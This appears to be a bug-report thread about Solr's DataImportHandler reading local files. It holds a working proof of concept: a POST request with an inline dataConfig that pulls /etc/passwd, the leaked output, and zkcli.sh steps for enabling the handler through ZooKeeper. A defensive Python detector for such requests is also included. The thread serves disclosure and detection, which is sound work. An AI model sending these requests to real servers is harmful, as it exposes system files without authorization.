Solr DataImportHandler leads to data export when the debug and verbose switches are on. A remote hacker can turn on the DataImportHandler with some config file. As we all know, the data import feature can import any file. If this feature is not enabled, we can turn it on by modifying the configuration file; do the steps described here. This file can also be a sensitive file on the file system, such as /etc/passwd, and the Solr system provides debugging; open it to get sensitive information. The following is the request:

POST /solr/gettingstarted_shard1_replica2/dataimport HTTP/1.1
.....

command=full-import&clean=true&commit=true&debug=true&wt=json&indent=true&verbose=true&optimize=false&dataConfig=%3CdataConfig%3E%0A++++%3CdataSource+type%3D%22BinFileDataSource%22+%2F%3E%0A++++%3Cdocument%3E%0A++++++++%3Centity+name%3D%22tika-test%22+processor%3D%22TikaEntityProcessor%22%0A++++++++++++++++url%3D%22%2Fetc%2Fpasswd%22+format%3D%22text%22%3E%0A++++++++++++++++%3Cfield+column%3D%22text%22+name%3D%22text%22%2F%3E%0A++++++++%3C%2Fentity%3E%0A++++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A

We can get the response:

HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Content-Length: 2917

{
  "responseHeader":{
    "status":0,
    "QTime":482},
  "initArgs":[
    "defaults",[
      "config","solr-data-config.xml"]],
  "command":"full-import",
  "mode":"debug",
  "documents":[],
  "verbose-output":[
    "entity:tika-test",[
      "document#1",[
        "query","/etc/passwd",
        "time-taken","0:0:0.0",
        null,"----------- row #1-------------",
        "text","root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nolog.............................
Thanks liaoxini for reporting this issue. I think the Solr Java process would only have access to read files which its Unix user has access to. Therefore, if you have access to the filesystem to modify configuration, you could just read the /etc/passwd file without Solr. Could you provide more details about how a remote hacker "can turn on the dataimporthandler with some config file"? If it's possible to modify configuration remotely, that could be a security issue.
I'm sorry, I forgot the steps for how to turn on the dataimporter function remotely.

The first step:

./server/scripts/cloud-scripts/zkcli.sh -zkhost 192.168.3.105:9983 -cmd getfile /configs/solr/solrconfig.xml solrconfig.xml

Add the following:

<lib dir="${solr.install.dir:../../../../dist}" regex="solr-dataimporthandler-.*\.jar" />
<requestHandler name="/dataimport" class="solr.DataImportHandler">
  <lst name="defaults">
    <str name="config">solr-data-config.xml</str>
  </lst>
</requestHandler>

Then upload it.

Step 2: Upload solr-data-config.xml, which reads as follows:

<dataConfig>
  <dataSource type="BinFileDataSource" />
  <document>
    <entity name="tika-test" processor="TikaEntityProcessor" url="/etc/passwd" format="text">
      <field column="text" name="text" />
    </entity>
  </document>
</dataConfig>

./server/scripts/cloud-scripts/zkcli.sh -zkhost 192.168.3.105:9983 -cmd putfile /configs/gettingstarted/solr-data-config.xml solr-data-config.xml

Step 3: From the web interface, press "reload" to reload the configuration.

Step 4: Send the POST request.
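A detection-side example, added here and not code from this thread, from Solr, or from the reporter: it parses a DataImportHandler request (path plus form body, in the shape of the request quoted in the report) and flags the combination the report relies on, debug/verbose output together with an inline dataConfig that points a file-backed data source at a path outside an import directory. ALLOWED_IMPORT_ROOT, the finding strings and the sample traffic are constructed for illustration; the first sample body is the request from the report, the other two are benign requests made up for contrast.

```python
"""Flag Solr DataImportHandler (DIH) requests that can echo local file content.

Added example for this bug thread; not Solr code and not the reporter's code.
ALLOWED_IMPORT_ROOT, the finding strings and SAMPLE_REQUESTS are assumptions
constructed for illustration.
"""
from typing import Dict, List, Tuple
from urllib.parse import parse_qs
import xml.etree.ElementTree as ET

# DIH data sources that read the local file system or fetch URLs.
FILE_OR_URL_SOURCES = {"BinFileDataSource", "FileDataSource",
                       "URLDataSource", "BinURLDataSource"}
# Assumed directory where legitimate import files live; anything else is suspect.
ALLOWED_IMPORT_ROOT = "/var/solr/import/"


def inspect_dataimport_request(path: str, body: str) -> List[str]:
    """Return human-readable findings for one HTTP request (path + form body)."""
    findings: List[str] = []
    if not path.split("?", 1)[0].rstrip("/").endswith("/dataimport"):
        return findings  # not a DIH request at all

    # parse_qs decodes %XX escapes and '+' for us; keep the last value per key.
    params = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}

    if params.get("debug") == "true":
        findings.append("debug=true: DIH echoes imported field values in the response")
    if params.get("verbose") == "true":
        findings.append("verbose=true: per-row output is included in the response")

    config = params.get("dataConfig")
    if config is None:
        return findings
    findings.append("inline dataConfig: data source definition supplied by the client")

    try:
        root = ET.fromstring(config)
    except ET.ParseError:
        findings.append("inline dataConfig is not well-formed XML")
        return findings

    for ds in root.iter("dataSource"):
        ds_type = ds.get("type", "")
        if ds_type in FILE_OR_URL_SOURCES:
            findings.append(f"dataSource type {ds_type} reads files or URLs")

    for ent in root.iter("entity"):
        name = ent.get("name")
        if ent.get("processor") == "TikaEntityProcessor":
            findings.append(f"entity {name!r} uses TikaEntityProcessor (extracts raw file text)")
        target = ent.get("url") or ent.get("baseDir") or ""
        if target.startswith("/") and not target.startswith(ALLOWED_IMPORT_ROOT):
            findings.append(f"entity {name!r} reads {target}, outside {ALLOWED_IMPORT_ROOT}")
    return findings


def risk_level(findings: List[str]) -> str:
    """Collapse findings into a triage level for alerting."""
    joined = "\n".join(findings)
    if "outside" in joined or "reads files or URLs" in joined:
        return "high"
    if "inline dataConfig" in joined or "debug=true" in joined:
        return "medium"
    return "none"


def scan(requests: List[Tuple[str, str]]) -> Dict[str, str]:
    """Map each request path to its risk level."""
    return {path: risk_level(inspect_dataimport_request(path, body))
            for path, body in requests}


# Constructed sample traffic. The first body is the request quoted in the report.
SAMPLE_REQUESTS = [
    ("/solr/gettingstarted_shard1_replica2/dataimport",
     "command=full-import&clean=true&commit=true&debug=true&wt=json&indent=true"
     "&verbose=true&optimize=false&dataConfig=%3CdataConfig%3E%0A++++%3CdataSource"
     "+type%3D%22BinFileDataSource%22+%2F%3E%0A++++%3Cdocument%3E%0A++++++++%3Centity"
     "+name%3D%22tika-test%22+processor%3D%22TikaEntityProcessor%22%0A++++++++++++++++"
     "url%3D%22%2Fetc%2Fpasswd%22+format%3D%22text%22%3E%0A++++++++++++++++%3Cfield"
     "+column%3D%22text%22+name%3D%22text%22%2F%3E%0A++++++++%3C%2Fentity%3E%0A++++"
     "%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A"),
    # Routine import that only uses the server-side solr-data-config.xml (made up).
    ("/solr/products/dataimport", "command=full-import&clean=true&commit=true&wt=json"),
    # Ordinary query, not a DIH request (made up).
    ("/solr/products/select", "q=*:*&wt=json"),
]

if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        found = inspect_dataimport_request(path, body)
        print(f"{risk_level(found):6} {path}")
        for item in found:
            print("       -", item)
```

The path test keys on the handler name, so it also catches the handler when it is registered under a different core. Only dataConfig supplied in the request is inspected; a config file that has already been uploaded to ZooKeeper, as in the steps above, is not visible in the request, which is why the debug and verbose flags are reported on their own as well.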
After installing the 'solr' package on Fedora 22 and 23, I don't see the zkcli.sh command. These are the files installed:

[root@336a10ac27fb /]# rpm -ql solr
/usr/share/doc/solr
/usr/share/doc/solr/CHANGES.txt
/usr/share/doc/solr/README.txt
/usr/share/java/solr
/usr/share/java/solr/solr-analysis-extras.jar
/usr/share/java/solr/solr-cell.jar
/usr/share/java/solr/solr-core.jar
/usr/share/java/solr/solr-dataimporthandler-extras.jar
/usr/share/java/solr/solr-dataimporthandler.jar
/usr/share/java/solr/solr-langid.jar
/usr/share/java/solr/solr-solrj.jar
/usr/share/java/solr/solr-test-framework.jar
/usr/share/java/solr/solr-uima.jar
/usr/share/java/solr/solr-velocity.jar
/usr/share/licenses/solr
/usr/share/licenses/solr/LICENSE.txt
/usr/share/licenses/solr/NOTICE.txt
/usr/share/maven-metadata/solr.xml
/usr/share/maven-poms/solr/lucene-solr-grandparent.pom
/usr/share/maven-poms/solr/solr-analysis-extras.pom
/usr/share/maven-poms/solr/solr-cell.pom
/usr/share/maven-poms/solr/solr-contrib-aggregator.pom
/usr/share/maven-poms/solr/solr-core.pom
/usr/share/maven-poms/solr/solr-dataimporthandler-extras.pom
/usr/share/maven-poms/solr/solr-dataimporthandler.pom
/usr/share/maven-poms/solr/solr-langid.pom
/usr/share/maven-poms/solr/solr-parent.pom
/usr/share/maven-poms/solr/solr-solrj.pom
/usr/share/maven-poms/solr/solr-test-framework.pom
/usr/share/maven-poms/solr/solr-uima.pom
/usr/share/maven-poms/solr/solr-velocity.pom

Can you check to make sure you obtained Solr from the Fedora repositories?

[root@336a10ac27fb /]# dnf provides solr
solr-4.10.3-3.fc22.noarch : Ultra-fast Lucene-based Search Server
Repo        : fedora

If you've obtained Solr directly from Apache, I'd suggest you contact Apache about this issue via security.